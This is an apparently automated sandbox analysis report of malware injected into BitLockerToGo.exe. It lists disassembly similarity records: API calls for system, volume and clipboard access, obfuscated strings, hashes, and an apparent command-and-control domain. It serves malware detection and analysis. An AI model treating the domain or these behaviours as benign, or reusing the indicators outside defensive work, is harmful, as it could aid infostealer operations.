                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1723540a1846d94c24543d21c7a1a3b585f13b44ca8238c146dc6d012f0b697c
                                                                                • Instruction ID: d1ed6343221dbdaf49cf3f71c90134c1507b14ae20b7e27ad8571ba4e2701cf6
                                                                                • Opcode Fuzzy Hash: 1723540a1846d94c24543d21c7a1a3b585f13b44ca8238c146dc6d012f0b697c
                                                                                • Instruction Fuzzy Hash: 50316FB4C013159BCB10DFA5D9456AFBBB0FB05300F54091DE4A1B7381C7349519CBEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1c997e9fcdb3e664df9980b05ce190663be61c9be508d6ba062dde421a33ffa
                                                                                • Instruction ID: 13b5cee33060aa4eab2da2a67c1164b99467e6cea3e9b7cd31d112db5ae21788
                                                                                • Opcode Fuzzy Hash: e1c997e9fcdb3e664df9980b05ce190663be61c9be508d6ba062dde421a33ffa
                                                                                • Instruction Fuzzy Hash: F2214F3250C3545BE7159E38548027F77D2ABC5324F2A853FEF9A4B381D63D4C51938A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 4126db-41270b call 43f920 3 41274a-4127cf 0->3 4 41270d-41270f 0->4 6 4127d1 3->6 7 412820-412831 3->7 5 412710-412748 call 41b220 4->5 5->3 8 4127e0-41281e call 41b190 6->8 9 412833-41283a 7->9 10 41284b-412853 7->10 8->7 13 412840-412849 9->13 14 412855-412856 10->14 15 41286b-412875 10->15 13->10 13->13 18 412860-412869 14->18 19 412877-41287b 15->19 20 41288b-412893 15->20 18->15 18->18 21 412880-412889 19->21 22 412895-412896 20->22 23 4128ab-4129e5 20->23 21->20 21->21 26 4128a0-4128a9 22->26 24 412a30-412a76 23->24 25 4129e7 23->25 28 412ab1-412ae2 call 410640 24->28 29 412a78 24->29 27 4129f0-412a2e call 41b320 25->27 26->23 26->26 27->24 37 412ae9-412af3 28->37 38 412b0a-412b3c GetSystemDirectoryW 28->38 31 412a80-412aaf call 41b2c0 29->31 31->28 37->38 39 412b43 38->39 40 412b3e-412b41 38->40 41 412b44-412b4c 39->41 40->39 40->41 42 412b53 41->42 43 412b4e-412b51 41->43 44 412b54-412b61 call 40cb00 call 440400 42->44 43->42 43->44 48 412b66-412b7c call 443a80 44->48
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(D7A5C987,00000104), ref: 00412B10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: DirectorySystem
                                                                                • String ID: "!,k$>)67$@-?+$FD76BE2C4B1B777BBDD6063A4A9627B5$GD$K%Q#$L!C/$armz$gutterydhowi.shop$inzB$mqg+$yk_'$zhez
                                                                                • API String ID: 2188284642-3662502334
                                                                                • Opcode ID: 8125ab20e87f46db09dea38c5f0e28aeecb5d5c3220ec2ad2ecd7ee87dee3daf
                                                                                • Instruction ID: 51490b07aa94a7e1a485e77134198223a8736deb0038431e0c56064bc1b05983
                                                                                • Opcode Fuzzy Hash: 8125ab20e87f46db09dea38c5f0e28aeecb5d5c3220ec2ad2ecd7ee87dee3daf
                                                                                • Instruction Fuzzy Hash: 3CB18AB44083C18BD7B08F15C480BEBBBE5AF86748F14495ED8C89B252C7398589CB97

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 139 43fe15-43fe33 140 43fe92-43fef3 VariantInit 139->140 141 43fdc0-43fdd6 139->141 142 43ff57 139->142 143 43fda5-43fdb1 call 40cb10 139->143 144 440102-440123 call 4495a0 GetVolumeInformationW 139->144 145 43fe3a-43fe8c SysFreeString * 3 139->145 146 4400df-4400ff call 4495a0 139->146 147 43fd9f 139->147 148 43fdfe-43fe0f VariantClear 139->148 149 43ff5d-43ff82 SysStringLen 139->149 150 43fddd-43fde6 139->150 151 43fded-43fdfa VariantClear 139->151 156 43fef5 140->156 157 43ff2b-43ff50 140->157 141->142 141->143 141->144 141->145 141->146 141->147 141->148 141->150 141->151 143->141 145->140 146->144 148->139 153 43ff84-43ff86 149->153 154 43ffcc 149->154 150->141 150->142 150->143 150->144 150->145 150->146 150->147 150->148 150->150 150->151 151->148 162 43ffa0-43ffa4 153->162 164 43ffce-43fff0 call 40cb00 154->164 165 43ff00-43ff29 call 443890 156->165 157->141 157->142 157->143 157->144 157->145 157->146 157->147 157->148 157->149 157->150 157->151 162->164 169 43ffa6-43ffc6 162->169 179 4400c4-4400d8 164->179 180 43fff6-43ffff 164->180 165->157 173 43ff88-43ff9e 169->173 174 43ffc8-43ffca 169->174 173->162 173->164 174->173 179->141 179->142 179->143 179->144 179->145 179->146 179->147 179->148 179->150 179->151 180->179 182 440005-44001a 180->182 183 44001c-440027 182->183 183->179 185 44002d-440031 183->185 186 440033-44003a 185->186 187 44003c-44004a 185->187 188 440099-44009f 186->188 189 44004c-440052 187->189 190 44006e-440073 187->190 193 4400a1-4400b4 188->193 194 4400bc-4400c0 188->194 189->190 191 440054-44006c 189->191 190->188 192 440075-440094 190->192 191->188 192->188 193->183 195 4400ba 193->195 194->179 195->179
                                                                                APIs
                                                                                • VariantClear.OLEAUT32(?), ref: 0043FDEE
                                                                                • VariantClear.OLEAUT32(?), ref: 0043FDFF
                                                                                • SysFreeString.OLEAUT32(?), ref: 0043FE51
                                                                                • SysFreeString.OLEAUT32(?), ref: 0043FE5A
                                                                                • SysFreeString.OLEAUT32(?), ref: 0043FE74
                                                                                • VariantInit.OLEAUT32(?), ref: 0043FE97
                                                                                • SysStringLen.OLEAUT32(?), ref: 0043FF61
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440123
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: String$FreeVariant$Clear$InformationInitVolume
                                                                                • String ID:
                                                                                • API String ID: 1956327722-0
                                                                                • Opcode ID: 3c2a9c405ed0aa4b7aa6432edb9a8eb0149d605a80af309c53eb78664d2ba22e
                                                                                • Instruction ID: 4a0f29d693b739fa4b0e929523c40e4964dc27ac6c1497435228e08315b2fa50
                                                                                • Opcode Fuzzy Hash: 3c2a9c405ed0aa4b7aa6432edb9a8eb0149d605a80af309c53eb78664d2ba22e
                                                                                • Instruction Fuzzy Hash: D7A1CCB1A08300DFE714DF24D881B1ABBE1FF89346F14892EF985972A1D339D945CB5A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 196 40d3a0-40d3ab call 445570 199 40d3b1-40d3c0 GetInputState call 43d2b0 196->199 200 40d57e-40d580 ExitProcess 196->200 203 40d3c6-40d3fb GetCurrentThreadId GetCurrentProcessId 199->203 204 40d579 call 446450 199->204 205 40d426-40d443 203->205 206 40d3fd-40d3ff 203->206 204->200 209 40d445 205->209 210 40d476-40d478 205->210 208 40d400-40d424 call 40d590 206->208 208->205 212 40d450-40d474 call 40d610 209->212 213 40d516-40d53b 210->213 214 40d47e-40d49b 210->214 212->210 216 40d566-40d56d call 40eef0 213->216 217 40d53d-40d53f 213->217 219 40d4c6-40d4e8 214->219 220 40d49d-40d49f 214->220 216->204 232 40d56f call 4125e0 216->232 222 40d540-40d564 call 40d780 217->222 219->213 221 40d4ea 219->221 225 40d4a0-40d4c4 call 40d690 220->225 226 40d4f0-40d514 call 40d700 221->226 222->216 225->219 226->213 236 40d574 call 410630 232->236 236->204
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess$ExitInputStateThread
                                                                                • String ID: =}K
                                                                                • API String ID: 1029096631-809673801
                                                                                • Opcode ID: 80d9181c2281a1eaf41ff3bae2d2fc0d468e320a6679c103485be258cebbdd62
                                                                                • Instruction ID: 935df52b93a0a194b2b8bad5d549bbeeb632c0e0b9ae705284cf3b648634dfef
                                                                                • Opcode Fuzzy Hash: 80d9181c2281a1eaf41ff3bae2d2fc0d468e320a6679c103485be258cebbdd62
                                                                                • Instruction Fuzzy Hash: 4241387480C240ABD701BF99D544A1EFBE5AF56709F188C2DE5C4A7392D33AD818CB6B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 325 445f16-445f59 326 445f86-445f9b LoadLibraryExW 325->326 327 445f5b 325->327 328 446424 326->328 329 445fa1-445fcb 326->329 330 445f60-445f84 call 446830 327->330 329->328 330->326
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(37B83947,00000000,00000800), ref: 00445F92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: 0EBC$4I2G
                                                                                • API String ID: 1029625771-3264664664
                                                                                • Opcode ID: 6b1583e07edebdc2078dc982c1d727ffde38e7c38aacb6c7d23c5cd6317d9e3c
                                                                                • Instruction ID: 2d40c61bae6aaca7a0720f5f4141c244ecd94e3e22f005b05162183df977b7e1
                                                                                • Opcode Fuzzy Hash: 6b1583e07edebdc2078dc982c1d727ffde38e7c38aacb6c7d23c5cd6317d9e3c
                                                                                • Instruction Fuzzy Hash: B8115A711083409FE700EF28D880A1EFBE5AB85345F658C2DE1D497352D734DA85CF5A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 407 4138c8-4138f2 CoInitializeSecurity * 2
                                                                                APIs
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004138DA
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,Function_000138E0), ref: 004138F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSecurity
                                                                                • String ID:
                                                                                • API String ID: 640775948-0
                                                                                • Opcode ID: 77e3c2ca095abd9bb4e487f12be5fc49362275886ea189103d1ef1ed3fc49959
                                                                                • Instruction ID: dca1209fd882ea2c30daa536e7d88e03d5b0ded06f02802dba2d32a9e6dbeb7f
                                                                                • Opcode Fuzzy Hash: 77e3c2ca095abd9bb4e487f12be5fc49362275886ea189103d1ef1ed3fc49959
                                                                                • Instruction Fuzzy Hash: C7E009393C9311BAF6B51BA5AC1BF182624A706F3AF340B64B3657C1E58AE076418A1D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 408 443a92-443a99 409 443aa6-443abc 408->409 410 443b67-443b6b 408->410 411 443aa0 408->411 412 443b0c-443b22 408->412 413 443b5b-443b61 RtlFreeHeap 408->413 414 443abe-443abf 409->414 415 443ae9-443aef 409->415 411->409 416 443b24 412->416 417 443b00-443b03 412->417 413->410 418 443ac0-443ae7 call 446940 414->418 415->412 419 443b30-443b57 call 446940 416->419 417->412 418->415 424 443b59 419->424 424->417
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00443B61
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: d12f10f9088e31b3f17c1b5b652731d0fb891f306d3b66cd352df1875465ef47
                                                                                • Instruction ID: 6d54e647c1e834c63cfb70667c16857a09461c0db4ac310fa50ac98d6548fd70
                                                                                • Opcode Fuzzy Hash: d12f10f9088e31b3f17c1b5b652731d0fb891f306d3b66cd352df1875465ef47
                                                                                • Instruction Fuzzy Hash: D911E434609341ABE3019F18E951A1ABBF1EB86B46F118C6DF8C597222C739ED50DB1A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 425 443a10-443a39 426 443a66-443a7d RtlAllocateHeap 425->426 427 443a3b 425->427 428 443a40-443a64 call 4468b0 427->428 428->426
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00443A73
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: bf0355abf37be71dd5e09aaaa23c9608dec97cdaa7e72b3b779351900deba867
                                                                                • Instruction ID: fb346d09377f6e8d0a6c8ad2f8c8f350226b3b24a0c10248792d6ef97a9a97f6
                                                                                • Opcode Fuzzy Hash: bf0355abf37be71dd5e09aaaa23c9608dec97cdaa7e72b3b779351900deba867
                                                                                • Instruction Fuzzy Hash: 7BF0493050D2409BE301EF58E944A0EFBE4EF96B01F14882CF4C49B262C336D814CBAB

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 431 446a50-446a82 LdrInitializeThunk
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(004126C9,?,00000001,?), ref: 00446A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 476 4125e0-4125fc CoInitialize
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 004125F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 5e1ae7bd08a1ae2eb3936d7baa43b240c9e27f8eb36e85f0878ba259c4a8be1a
                                                                                • Instruction ID: c7857bf22242331c2f2b437fee4c59ca82a8ac02caa364dd229372247d18a1de
                                                                                • Opcode Fuzzy Hash: 5e1ae7bd08a1ae2eb3936d7baa43b240c9e27f8eb36e85f0878ba259c4a8be1a
                                                                                • Instruction Fuzzy Hash: 0AC080341152157BD30037395C1BF17355CD347761F400334BD62815D1F5206510C1FD
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID: "T8b$%\! $.[+e$4HBj$4KjU$7C-M$8G-A$=O1I$A/Y)$D$FkJu$GD$R$S'M!$[7N1$_X.P$eW*Q$gutterydhowi.shop$if*r$pSo]$|_oY$~8A
                                                                                • API String ID: 3861434553-603053953
                                                                                • Opcode ID: 765efd1d3bd601d9134aa48ef38f897ae4587008bea059e0f647b94d77fd41bb
                                                                                • Instruction ID: 168a13f1e19ae6d2b210e0d4310acf60bd90078fdb24f986eec146a25e6058f8
                                                                                • Opcode Fuzzy Hash: 765efd1d3bd601d9134aa48ef38f897ae4587008bea059e0f647b94d77fd41bb
                                                                                • Instruction Fuzzy Hash: D762BDB44083809BD3B09F21D8517DFBBE5AF86709F04482DE4C89B382DB799549CB5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >C$';/8$GD$LR($YZYQ$nLv:$xl&o$~PF3
                                                                                • API String ID: 0-680855572
                                                                                • Opcode ID: 927d39e6bcfe8858cb14c64dc3b2a8fe1ed79f6561c88eb8be888fa039bd2c3c
                                                                                • Instruction ID: 98c22d93839423100b65652acd379743d0cf5e5847e159820dcbbb44c6cfc041
                                                                                • Opcode Fuzzy Hash: 927d39e6bcfe8858cb14c64dc3b2a8fe1ed79f6561c88eb8be888fa039bd2c3c
                                                                                • Instruction Fuzzy Hash: 0E23AC70404B808BE7318F35C490BA3BBE1AF1B309F18199ED4EB8B692D779B545CB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: {8}$&+$*$/$$4`[b$4`[b$8K>M$LO$\_$d7e9$s3b5$u}$xK"M$|}$~?l!$31
                                                                                • API String ID: 0-1063741193
                                                                                • Opcode ID: 35ccbd6d3950b926157f95e5e9afc4958ccbf62df1d35d7dce8d4d5238d8438e
                                                                                • Instruction ID: 9289a6f14ecc30de8dc0db08bd352fb0a7a8a58d6584ed5cd1e3808d7fe9c27b
                                                                                • Opcode Fuzzy Hash: 35ccbd6d3950b926157f95e5e9afc4958ccbf62df1d35d7dce8d4d5238d8438e
                                                                                • Instruction Fuzzy Hash: 85A23CB4508381CBE330DF24E484B9BBBE1FB85304F50892DE5D99B251DB748985CB97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 03$0e<k$1i2o$4`[b$7q>w$<EBC$=u({$Q1:O$a9D7$7#v
                                                                                • API String ID: 0-2126314546
                                                                                • Opcode ID: f8c9d21ab45b1c1ae02dbf6348da07ca90a87e78ccdbce9fe7f31849cfb05644
                                                                                • Instruction ID: e593442dbae6b15918b7f83f6931d4fd5ef55608cbdeddf4db8802701d18aa54
                                                                                • Opcode Fuzzy Hash: f8c9d21ab45b1c1ae02dbf6348da07ca90a87e78ccdbce9fe7f31849cfb05644
                                                                                • Instruction Fuzzy Hash: E1E1ECB5508340DBE310AF65E881A2FBBF4EF8A309F54092DF2C597262D379D850CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "LHC$"LHC$&%9$*#1/$9&!:$JS$K_I\$VPNj$XTJR$YWW\$kwm{$uwSR$@DN
                                                                                • API String ID: 0-255386557
                                                                                • Opcode ID: 3cf692da58030e4c4643129ff8edaa309ceafd6f4efad0db9198382b9384e1fc
                                                                                • Instruction ID: f114aee845b60174f2e8f6839ff444147f7be65b901f554828115d267bae5542
                                                                                • Opcode Fuzzy Hash: 3cf692da58030e4c4643129ff8edaa309ceafd6f4efad0db9198382b9384e1fc
                                                                                • Instruction Fuzzy Hash: 94A146B45083909FD721CF1AC49062BFBE1AF96314F14896DE4E99B392C7398909CF97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (+*%$,/.)$4761$8;:5$<=>?$<?>9$IJKT$]^_X$`abc$defg${$~d
                                                                                • API String ID: 0-940626759
                                                                                • Opcode ID: 95a779bf15a6493f29bc26897529c8a0f5cf015bc3b14fb702ec0d5dd567008e
                                                                                • Instruction ID: 26f8fe591303e8990c845311b2f9926569366999e9b42b6386bfbce9d91456fc
                                                                                • Opcode Fuzzy Hash: 95a779bf15a6493f29bc26897529c8a0f5cf015bc3b14fb702ec0d5dd567008e
                                                                                • Instruction Fuzzy Hash: BFB29BB4600B009FD760DF25C881BE7B7E2BF45304F54482EE5EA9B291DB39B885CB59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                • String ID: !$W
                                                                                • API String ID: 1647500905-3257520180
                                                                                • Opcode ID: 245d4eabe0e29d95f4eaf33a61b4d2af326822ff5d3756d0540b1f90bf903f25
                                                                                • Instruction ID: 7d191405d6d2be99e237cd964664e06e39f21a9ebe49f28891bcbad048578220
                                                                                • Opcode Fuzzy Hash: 245d4eabe0e29d95f4eaf33a61b4d2af326822ff5d3756d0540b1f90bf903f25
                                                                                • Instruction Fuzzy Hash: 0641607100C782CED310AF7D944476FBFE0AB9A324F145E6EE8E6862C1C2B88949D757
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff$gfff
                                                                                • API String ID: 0-3817530714
                                                                                • Opcode ID: eecfadbc3dd44c1c1988cd8f427b5997e81374dbceba94025e70e87a165e6548
                                                                                • Instruction ID: 3e75273a225b4ee2b2d955962ea0ee81924f4cc219ea13a812ea84d2314c41a9
                                                                                • Opcode Fuzzy Hash: eecfadbc3dd44c1c1988cd8f427b5997e81374dbceba94025e70e87a165e6548
                                                                                • Instruction Fuzzy Hash: 84D2C1716083518FD714CE28C48466BBBE1AF89314F188A3EF895AB3D1D778DE45CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !Y)[$(],_$4`[b$4`[b$5M0O$7E9G$9Q>S$L!P#$a%a'
                                                                                • API String ID: 0-2010590211
                                                                                • Opcode ID: 31519a682702341fdd90ad05b980f312f5d24af38d8702937bf2ebeff385def1
                                                                                • Instruction ID: f52b9d5d6d8c16d2b3e750f68139345165a3ccb28bff46d0fb3f13a6fbeda457
                                                                                • Opcode Fuzzy Hash: 31519a682702341fdd90ad05b980f312f5d24af38d8702937bf2ebeff385def1
                                                                                • Instruction Fuzzy Hash: 65E189B5508340EFE3249F15E881B6BB7F5FB86305F54892EE5C58B2A2D778D800CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (+$@L$KX$OV$`c$xy$su$wy
                                                                                • API String ID: 0-2844685729
                                                                                • Opcode ID: 39ecd642eeef917e0dccb719401dddac168993a8da47d35ffb6d33fbd903dd08
                                                                                • Instruction ID: 9fc506c3712f2512ae1bf9f47f50162f254d8f85ad1b1fd7028464c245a2f904
                                                                                • Opcode Fuzzy Hash: 39ecd642eeef917e0dccb719401dddac168993a8da47d35ffb6d33fbd903dd08
                                                                                • Instruction Fuzzy Hash: E52288B55083509BC310AF15E881A2FBBF1EFA5348F88891DF4C48B362D379D954CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $TG2$&PiD$/T,^$3<<3$4`[b$cK_+$wdML
                                                                                • API String ID: 0-649118298
                                                                                • Opcode ID: b066425d03e55441fa22898a86003422314e02ac83849ebafd1297b4b6f602a6
                                                                                • Instruction ID: 473a4b0849483d9361cbae160725e23d68a84184e453fd012e045444df189b53
                                                                                • Opcode Fuzzy Hash: b066425d03e55441fa22898a86003422314e02ac83849ebafd1297b4b6f602a6
                                                                                • Instruction Fuzzy Hash: C4D15C72A087518BC714CF29E85162FB7E2ABC9305F598A3DE996DB382DB34DC04C785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                • API String ID: 0-925659942
                                                                                • Opcode ID: 63b0c98ada276a7db8ca2de78e9f11cfab34110acfd8c1d97c294382a892ea81
                                                                                • Instruction ID: 1f20886c7fe622dd91454dc918cf5afdf2d28ca061c413c5dda02c56848c16f2
                                                                                • Opcode Fuzzy Hash: 63b0c98ada276a7db8ca2de78e9f11cfab34110acfd8c1d97c294382a892ea81
                                                                                • Instruction Fuzzy Hash: 1EF1B33160C3918FC718CE28C58466BBBE1AFC5304F088A7EE8D9A73D1D679DD458B86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                • API String ID: 0-854689426
                                                                                • Opcode ID: de151a076f353158c2153ad0f6e7e27ffe6824baaffa39dc400b827ed9249482
                                                                                • Instruction ID: edee618adb98484859ce012df97bcd3699ce2ae956030f8cfee9ea2a131d6434
                                                                                • Opcode Fuzzy Hash: de151a076f353158c2153ad0f6e7e27ffe6824baaffa39dc400b827ed9249482
                                                                                • Instruction Fuzzy Hash: 1BD1BF3160C3918FC714CE29C58465BBBE1AFC9304F088A7EE8D9E7392D678DD458B96
                                                                                Strings
